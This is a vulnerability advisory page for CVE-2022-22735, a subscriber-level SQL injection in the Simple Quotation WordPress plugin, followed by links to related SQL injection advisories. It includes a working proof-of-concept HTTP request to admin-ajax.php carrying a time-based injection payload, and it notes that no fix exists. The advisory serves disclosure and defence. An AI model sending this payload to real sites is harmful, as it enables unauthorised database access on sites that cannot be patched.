Simple Quotation <= 1.3.2 – Subscriber+ SQL injection | CVE 2022-22735 | Plugin Vulnerabilities

Description

The plugin does not have authorisation (and CSRF) checks in various of its AJAX actions and is lacking escaping of user data when using it in SQL statements, allowing any authenticated users, such as subscriber to perform SQL injection attacks

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 41
Connection: close
Cookie: [subscriber+]

action=delete_link&idLink=2+OR+SLEEP(2)--

Affects Plugins

simple-quotation

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

abhishek bhoir

Submitter

abhishek bhoir

Verified

Yes

WPVDB ID

6940a97e-5a75-405c-be74-bedcc3a8ee00

Timeline

Publicly Published

2022-02-16 (about 2 years ago)

Added

2022-02-16 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2015-04-14

Title

Community Events < 1.4 - SQL Injection

Published

2023-11-28

Title

Bravo Translate <= 1.2 - Authenticated (Administrator+) SQL Injection

Published

2022-04-13

Title

BadgeOS < 3.7.1 - Unauthenticated SQLi

Published

2016-12-05

Title

WA Form Builder 1.1 - Unauthenticated SQL Injection

Published

2023-09-12

Title

Booking calendar, Appointment Booking System < 3.2.9 - Multiple Authenticated(Editor+) SQL Injection